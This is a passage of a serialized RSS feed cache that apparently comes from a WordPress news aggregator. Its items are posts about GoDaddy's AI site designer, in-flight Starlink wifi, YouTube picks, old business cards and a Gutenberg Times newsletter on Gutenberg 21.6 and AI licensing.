Minutes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=109724\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"https://openchannels.fm/godaddys-new-ai-site-designer-from-idea-to-wordpress-site-in-minutes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:157:\"Our sponsor GoDaddy\'s Airo Site Designer is an AI tool that quickly creates WordPress sites from simple prompts, making it easy for anyone to go online fast.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 17 Sep 2025 09:36:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Matt: United Starlink\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"https://ma.tt/2025/09/united-starlink/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"https://ma.tt/2025/09/united-starlink/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:978:\"<p>I’m on my first United flight with Starlink, and wow! I ran a <a href=\"https://fast.com/\">fast.com</a> test and got 110 mbps down and 38 mbps up, which is insane.  28ms ping times. While flying! When you think of all of the engineering and technology coming together to let me blog this it’s really incredible.</p>\n\n\n\n<p>Update 2025-09-16: United actually responded to my tweet about this. <img alt=\"😂\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f602.png\" style=\"height: 1em;\" /></p>\n\n\n\n<figure class=\"wp-block-embed is-type-rich is-provider-twitter wp-block-embed-twitter\"><div class=\"wp-block-embed__wrapper\">\n<div class=\"embed-twitter\"><blockquote class=\"twitter-tweet\"><p dir=\"ltr\" lang=\"en\">Entertainment at 35,000 feet has never been better (or faster)! ?</p>&mdash; United Airlines (@united) <a href=\"https://twitter.com/united/status/1968318805018632648?ref_src=twsrc%5Etfw\">September 17, 2025</a></blockquote></div>\n</div></figure>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 17 Sep 2025 00:05:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"Open Channels FM: How WordPress Playground Is Opening Doors to Inclusive Learning Everywhere\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=108627\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"https://openchannels.fm/how-wordpress-playground-is-opening-doors-to-inclusive-learning-everywhere/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:204:\"WordPress Playground revolutionizes web development by providing a browser-based platform for learning and experimentation, making it accessible globally, particularly for users in resource-limited areas.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 16 Sep 2025 12:55:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"Open Channels FM: From Print Design to Podcasting, the Scenic Route to Creativity\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://openchannels.fm/?p=109666\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"https://openchannels.fm/from-print-design-to-podcasting-the-scenic-route-to-creativity/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:156:\"In this episode, BobWP shares the launching his blog and podcast, Bob\'s Wild Pathways, filled with honest stories and insights from his creative adventures.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 16 Sep 2025 10:11:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Matt: Retention\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149819\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://ma.tt/2025/09/retention/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:120:\"<p>Andrew Chen <a href=\"https://x.com/andrewchen/status/1965419750525431873?s=46\">has a great post on retention</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 16 Sep 2025 04:40:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Matt: Weekend YouTubes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149801\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"https://ma.tt/2025/09/weekend-youtubes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3290:\"<p>One of my favorite YouTubers is <a href=\"https://charlescornellstudios.com/\">Charles Cornell</a> (WordPress-powered!), who <span style=\"margin: 0px; padding: 0px;\">creates great videos </span>that break down the music theory of various things you’ve heard, such as this adorable one featuring <a href=\"https://www.youtube.com/watch?v=U-fv_oyYhqc\">SNES soundtracks</a> or <a href=\"https://www.youtube.com/watch?v=rRRSWmZrJGs\">The Legend of Zelda: Breath of the Wild</a>. I first came across him <a href=\"https://www.youtube.com/watch?v=1Popdt3NYgU\">reacting to Jacob Collier in 2020</a>. Once I got super-into Severance, <a href=\"https://www.youtube.com/watch?v=LQg1TMEEPnQ\">his breakdown of the spooky music is great</a>. It’s also interesting to see that the YouTube community is going through its own version of fair use and copyright, trademark, etc., enforcement, which he discusses <a href=\"https://www.youtube.com/watch?v=4GrLFQ26jFs\">here</a>.</p>\n\n\n\n<p><a href=\"https://blog.samaltman.com/\">Sam Altman</a> is always interesting to follow, and it&#8217;s interesting to contrast this <a href=\"https://www.youtube.com/watch?v=6pxmdmlJCG0\">great interview he did with David Perell on writing</a> with this <a href=\"https://www.youtube.com/watch?v=5KmpT-BoVf4\">very direct and awkward one with Tucker Carlson</a>. I have immense respect for anyone who enters the arena and engages directly with journalists or critics, rather than hiding behind PR agents or lawyers. Given the current blood feud, it&#8217;s fun to go back eight years and <a href=\"https://www.youtube.com/watch?v=tnBQmEqBCY0\">see Sam Altman interview Elon Musk</a>, long before any of the AI stuff blew up they were both terribly prescient.</p>\n\n\n\n<p>Ray Dalio is always a gem and <a href=\"https://www.youtube.com/watch?v=49RT6SQ8n0Y\">he went on Diary of a CEO</a>. Theo Browne <a href=\"https://www.youtube.com/watch?v=6TMPWvPG5GA\">has a good take on what it means to vibe code</a>. Kishan Bagaria <a href=\"https://www.youtube.com/watch?v=vwsfdRY-K2s\">discusses how Beeper is going to reach 100  million users</a>. The story of how Atlassian took a <a href=\"https://www.youtube.com/watch?v=7SKUw3w2FEg\">non-traditional enterprise path with Jay Simons is great</a>. Not a YouTube, but don&#8217;t miss <a href=\"https://www.theverge.com/decoder-podcast-with-nilay-patel/773904/sierra-ceo-bret-taylor-ai-agents-openai-bubble-interview\">Bret Taylor on The Verge</a>. Check out <a href=\"https://www.youtube.com/watch?v=6N7XvGaQ72E\">Adam D&#8217;Angelo at South Park Commons</a>.</p>\n\n\n\n<p>And finally, I&#8217;ll say that <a href=\"https://www.youtube.com/premium\">YouTube Premium</a>, which turns off all the ads, is probably one of the highest value subscriptions you can have. <span style=\"margin: 0px; padding: 0px;\">Many of these are essentially like podcasts, and from a product perspective, I think we need to figure out how to sync and allow seamless movement between watching, listening, or reading transcripts</span> in <a href=\"https://pocketcasts.com/\">Pocket Casts</a> (Automattic&#8217;s open-source podcasting app). We support video podcasts, but there&#8217;s no good way yet to have a <a href=\"https://www.audible.com/ep/wfs\">Whispersync-like</a> experience between video, audio, and a transcript.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 14 Sep 2025 23:23:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: Old Business Cards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://ma.tt/?p=149786\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"https://ma.tt/2025/09/old-business-cards/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2624:\"<p><br />I recently came across a few old business cards I designed back in 1999. The first ones were for my services as a saxophone player:</p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img alt=\"\" class=\"wp-image-149788\" height=\"336\" src=\"https://i0.wp.com/ma.tt/files/2025/09/business-card-blue-1024x569.jpg?resize=604%2C336&#038;quality=89&#038;ssl=1\" width=\"604\" /></figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"\" class=\"wp-image-149787\" height=\"345\" src=\"https://i0.wp.com/ma.tt/files/2025/09/business-card-yellow-1024x585.jpg?resize=604%2C345&#038;quality=89&#038;ssl=1\" width=\"604\" /></figure>\n</figure>\n\n\n\n<p>A few notes:</p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>I went mostly by “Matthew” then.</li>\n\n\n\n<li>At some point I decided to remove the home address and say that I was available to play not just alto saxophone but baritone, tenor, and soprano as well.</li>\n\n\n\n<li>The number was the home shared house number, not a cell phone.</li>\n\n\n\n<li>The email was an email address the entire family shared, under my dad’s name.</li>\n\n\n\n<li><a href=\"https://www.hal-pc.org/\">HAL-PC</a> was an amazing non-profit local to Houston that stood for the “Houston Area League of PC users.” There was a pretty reasonable annual membership fee, and they hosted a monthly general meeting which had hundreds of attendees, always with a presentation or two and a raffle giveaway at the end. They were a dial-up ISP and BBS/newsgroup host. I volunteered for them by going in on Saturdays where they had a room people could bring their broken computers to and get free tech support, and by hosting a SIG, or special-interest group, around PalmOS called <a href=\"https://hpug.org/\">HPUG</a>, the Houston Palm Users Group. This was a big part of the inspiration for WordCamps.</li>\n</ul>\n\n\n\n<p>This was for my “design” business:</p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"\" class=\"wp-image-149789\" height=\"345\" src=\"https://i0.wp.com/ma.tt/files/2025/09/business-card-design-1024x585.jpg?resize=604%2C345&#038;quality=89&#038;ssl=1\" width=\"604\" /></figure>\n\n\n\n<p><br />I would also design business cards for friends, here’s one for my friend who was a percussionist and vibraphonist, Chase Jordan: </p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img alt=\"\" class=\"wp-image-149790\" height=\"362\" src=\"https://i0.wp.com/ma.tt/files/2025/09/business-card-chase-jordan.jpg?resize=604%2C362&#038;quality=89&#038;ssl=1\" width=\"604\" /></figure>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 14 Sep 2025 02:50:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:21:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"Gutenberg Times: Licensing for AI, Patterns, Gutenberg 21.6, and future of WordPress—Weekend Edition #340\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=41777\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:112:\"https://gutenbergtimes.com/licensing-for-ai-patterns-gutenberg-21-6-and-future-of-wordpress-weekend-edition-340/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:26136:\"<p>Hi there,</p>\n\n\n\n\n\n<p>Welcome to the WCUS Part 2. The workshop recordings are online, and my chat with other dev advocates has also been published. You can read about it in this article, which includes the video: <a href=\"https://gutenbergtimes.com/wordpress-ai-and-the-generational-shift-insights-from-wcus-creators-studio/\">WordPress, AI, and the generational shift: insights from #WCUS Creators Studio</a>. </p>\n\n\n<div class=\"ng-block-fd2fed3bb18d18ce wp-block-newsletterglue-image ng-block size-large is-resized\" width=\"100%\"><div><div><div align=\"center\" class=\"ng-block-td\" style=\"padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px;\"><a href=\"https://gutenbergtimes.com/wordpress-ai-and-the-generational-shift-insights-from-wcus-creators-studio/\"><img alt=\"In the WCUS Creators Studio: Brian Coords, Jonathan Bossenger, Birgit Pauli-Haack, Ryan Welcher\" class=\"wp-image-41835 ng-image\" height=\"337\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-10-at-15.46.21.jpg?resize=600%2C337&#038;ssl=1\" style=\"border-style: none; border-color: transparent;\" width=\"600\" /></a></div></div></div></div>\n\n\n<div class=\"wp-block-spacer\" style=\"height: 20px;\"></div>\n\n\n\n<p>A few publishers assembled to come up with a <a href=\"https://rslstandard.org/\">license standard for machines</a>, aka AI. As site builders, or owners, you&#8217;ll be interested that there has been some work on the way. More below.</p>\n\n\n\n<p>Have a splendid weekend ahead! </p>\n\n\n\n<p>Yours, <img alt=\"💕\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f495.png\" style=\"height: 1em;\" /><br /><em>Birgit</em></p>\n\n\n<section class=\"wp-block-newsletterglue-group\" style=\"padding-top: 10px; padding-bottom: 10px; padding-left: 20px; padding-right: 20px; margin-top: 0px; margin-bottom: 0px;\">\n<div class=\"wp-block-group has-light-background-background-color has-background\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<p><strong>Table of Contents</strong></p>\n\n\n\n<nav class=\"wp-block-table-of-contents\"><ol><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/licensing-for-ai-patterns-gutenberg-21-6-and-future-of-wordpress-weekend-edition-340/#wordcamp-us\">WordCamp US </a></li><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/licensing-for-ai-patterns-gutenberg-21-6-and-future-of-wordpress-weekend-edition-340/#0-word-press-release-information\">Developing Gutenberg and WordPress</a></li><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/licensing-for-ai-patterns-gutenberg-21-6-and-future-of-wordpress-weekend-edition-340/#0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</a></li><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/licensing-for-ai-patterns-gutenberg-21-6-and-future-of-wordpress-weekend-edition-340/#2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</a></li><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/licensing-for-ai-patterns-gutenberg-21-6-and-future-of-wordpress-weekend-edition-340/#3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor.</a></li><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/licensing-for-ai-patterns-gutenberg-21-6-and-future-of-wordpress-weekend-edition-340/#new-in-the-playground-world\">New in the Playground world</a></li><li><a class=\"wp-block-table-of-contents__entry\" href=\"https://gutenbergtimes.com/licensing-for-ai-patterns-gutenberg-21-6-and-future-of-wordpress-weekend-edition-340/#ai-news\">AI News</a></li></ol></nav>\n</div></div>\n</section>\n\n\n<h2 class=\"wp-block-heading\" id=\"wordcamp-us\">WordCamp US </h2>\n\n\n\n<p>As mentioned, the recordings of the Workshop are now online. The block and site editor related ones are: </p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://wordpress.tv/2025/09/05/the-block-developer-cookbook/\">The Block Developer Cookbook</a> with Ryan Welcher</li>\n\n\n\n<li><a href=\"https://wordpress.tv/2025/09/05/launch-your-personal-portfolio-a-hands-on-wordpress-workshop/\">Launch Your Personal Portfolio — A Hands-On WordPress Workshop</a> w/ Jamie Marsland. </li>\n</ul>\n\n\n\n<p>If you are more interested in AI and development, these might be for you: </p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https://wordpress.tv/2025/09/05/turn-your-local-wordpress-install-into-your-ai-coding-assistant/\">Turn Your Local WordPress Install Into Your AI Coding Assistant</a> with Jonathan Bossenger</li>\n\n\n\n<li><a href=\"https://wordpress.tv/2025/09/05/scalable-ethical-ai-how-to-own-your-content-and-your-ai-with-wordpress/\">Scalable, Ethical AI: How to Own Your Content and Your AI with WordPress</a> with Jeff Paul </li>\n\n\n\n<li><a href=\"https://wordpress.tv/2025/09/03/unlock-developer-superpowers-with-ai/\">Unlock Developer Superpowers with AI</a> with Adam Silverstein</li>\n</ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"0-word-press-release-information\">Developing Gutenberg and WordPress</h2>\n\n\n\n<p>It was <strong>Ryan Welcher</strong>&#8216;s turn to publish this month&#8217;s <a href=\"https://developer.wordpress.org/news/2025/09/whats-new-for-developers-september-2025/\"><strong>What’s new for developers? (September 2025</strong>)</a>. The updates include: </p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Composer package for the Abilities API now available for early testing ahead of WordPress 6.9</li>\n\n\n\n<li>Four experimental Accordion blocks (Accordion, Accordion Item, Accordion Header, Accordion Panel) powered by the Interactivity API. </li>\n\n\n\n<li>Theme.json now supports styling form elements, including text inputs and select dropdowns. </li>\n\n\n\n<li>Data Views received multiple enhancements, including infinite scroll and card layouts. </li>\n\n\n\n<li>The Date block now supports custom dates and block bindings </li>\n\n\n\n<li>A new Query Loop Title block variation displays post type labels. </li>\n\n\n\n<li>WordPress Playground added support for multiple theme installations and new CLI flags, plus PHP debugging improvements through XDebug Bridge. </li>\n\n\n\n<li>The AI team released stable versions of core libraries and introduced new development tools. </li>\n</ul>\n\n\n\n<p>For details and more, you need to <a href=\"https://developer.wordpress.org/news/2025/09/whats-new-for-developers-september-2025/\">read the post</a>. <img alt=\"🤗\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f917.png\" style=\"height: 1em;\" /> </p>\n\n\n\n<p class=\"has-accent-color has-text-color has-link-color wp-elements-d65ff08da66da2d111d02250490fde35\">Don&#8217;t miss a new article on the WordPress developer blog again. <a href=\"https://developer.wordpress.org/news/subscribe/\">Subscribe! </a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><a href=\"https://x.com/cbravobernal\"><strong>Carlos Bravo</strong></a> managed the release of Gutenberg 21.6 and highlights in his post <a href=\"https://make.wordpress.org/core/2025/09/10/whats-new-in-gutenberg-21-6-10-september/\"><strong>What’s new in Gutenberg 21.6? (10 September)</strong></a>: </p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><a href=\"https://make.wordpress.org/core/2025/09/10/whats-new-in-gutenberg-21-6-10-september/#new-accordion-button\">New add accordion button</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2025/09/10/whats-new-in-gutenberg-21-6-10-september/#improved-dataviews-grid\">Improved DataViews grid interface.</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2025/09/10/whats-new-in-gutenberg-21-6-10-september/#inputs\">Form elements  now support global styles</a></li>\n</ol>\n\n\n\n<figure class=\"wp-block-image size-large\"><img alt=\"\" class=\"wp-image-41891\" height=\"291\" src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2025/09/Screenshot-2025-09-13-at-14.03.46.png?resize=652%2C291&#038;ssl=1\" width=\"652\" /></figure>\n\n\n\n<div class=\"wp-block-group has-light-background-background-color has-background\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<p><img alt=\"🎙\" class=\"wp-smiley\" src=\"https://s.w.org/images/core/emoji/16.0.1/72x72/1f399.png\" 